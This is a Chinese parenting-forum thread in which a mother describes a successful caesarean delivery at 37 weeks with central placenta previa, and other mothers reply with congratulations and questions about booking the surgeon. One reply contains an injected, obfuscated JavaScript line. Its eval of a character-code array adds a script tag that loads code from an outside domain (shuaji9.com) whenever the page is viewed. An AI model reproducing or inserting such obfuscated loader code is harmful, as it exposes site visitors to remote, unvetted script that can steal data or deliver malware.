帖子详情

中央性前置胎盘,顺利剖产!

1570864怀孕妈妈

24周开始得知前置胎盘,而且是中央性前置胎盘。。自此之后,了解的妈妈应该十分清楚,整个孕期都在忐忑不安和祈祷中度过。尽量都在卧床,还每天担心出血,每次上厕所都潜移默化观察内裤有没有血。
一个月bc观察一次,可惜每次都无惊喜,一直都是胎盘完全覆盖宫内口[流泪]好吧,,这会我不求能长上去了,只求剖腹顺利别大出血。。医生建议一足月就剖,终于撑到37周就马上剖了,由于孕期担忧太久,到剖腹心里出奇的淡定和轻松,感觉终于要卸下了。剖腹期间出血600cc,不用输血,整个过程算轻松,没有疼痛,也没有其他宝妈说的压肚子痛,唯一的就是撤了尿管后拉第一泡尿时相当难受!伤口医生也缝的很漂亮!幸好的是,整个孕期没有出过血。。
最后,介绍下我家二宝,还是小王子,37周,之前bc一直说偏小,双顶径也小,出来有5.24斤,长48cm[调皮]
同样情况的宝妈们都放宽心,其实没有想象中可怕,祝所有宝妈和宝儿都顺利健康平安!!
精选回帖
我也是要找她剖的,你提前多久约手术时间,给了红包吗?
2017/03/12回复
$('ed2k_CX7').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';恭喜了,一切顺利
我也是,最后熬到38周剖,过后医生还告诉我胎盘有植入,本来还一直担心一直担心,其实还好,也可能是自己幸运。反正如果遇上的姐妹还是乐观点面对吧,不要自己吓自己
2017/03/13回复
我8年前在中山一剖大的时候就不用备皮,中山一是不用的。
61楼
1970/01/01回复
全部回帖
細寶細寶沙发
恭喜恭喜
恭喜宝妈。
太棒了!恭喜楼主了!

你是在哪个医院生的?
jinying237 发表于 2017-03-12 15:41
太棒了!恭喜楼主了!

你是在哪个医院生的?
珠江新城妇儿,张广兰剖的。
細寶 发表于 2017-03-12 09:35
恭喜恭喜
谢谢!
宝妈520baby:
查看原文
我也是要找她剖的,你提前多久约手术时间,给了红包吗?

恭喜了,一切顺利
恭喜恭喜!请问张广兰要怎样约剖腹产?是不是产检时约好时间?
恭喜恭喜
我以前都是前置胎盘,而且胎位不正,直接剖腹产了。
PoiDesuPoiDesu12楼
恭喜宝妈!
恭喜恭喜!
我也前置胎盘,边缘性的。很后悔剖腹😭😭😭😭
前置是不是一定要剖腹
希粒妈 发表于 2017-03-12 20:03
回复 宝妈520baby 的帖子
我也是要找她剖的,你提前多久约手术时间,给了红包..
我因为前置胎盘,所以不能拖久,一足月37周就剖
希粒妈 发表于 2017-03-12 20:03
回复 宝妈520baby 的帖子
我也是要找她剖的,你提前多久约手术时间,给了红包..
准备了,没给,根本没机会给!
akikozrx 发表于 2017-03-12 22:36
恭喜恭喜!请问张广兰要怎样约剖腹产?是不是产检时约好时间?
是的
林夕小屋 发表于 2017-03-13 11:57
我也前置胎盘,边缘性的。很后悔剖腹😭😭😭😭
我是完成性的,是一定要剖的。你那时出血量多少?
猜你喜欢

一胎剖二胎顺成功

中央性/完全性前置胎盘真的升不上去?纠结阿!

省妇幼ICU病房

报喜啦,36W+前置胎盘得到纠正,可以不用剖啦~!一切皆有可能

二宝出世了,上来收花花,付孕期照片和特征咯

32周刚刚确诊中央性前置胎盘,好担心啊

热点推荐

殡仪馆也卷!华南理工毕业争考遗体火化工

地摊生意原来这么火爆 你会买吗?

感动到了!喜茶送了个龙年限定生日徽章

藏在市区的遛娃胜地 回归自然很有趣

速速归队!广州妈妈网喊你回家啦

时尚天河自助购物饰品店 价钱还便宜

进来养养眼 闯入了青色植被的世界

周末的北京路人山人海 文旅集市好热闹

小户型大视感 空间有限也能改得很精彩

富贵饭堂滑蛋牛肉饭 最经典的竟是饮料

白云区的凯德美食广场 人少还便宜

晒下一家人的晚餐 有餸有汤简简单单

夏天和冰淇淋很配 一口回到小时候

查看更多热点 >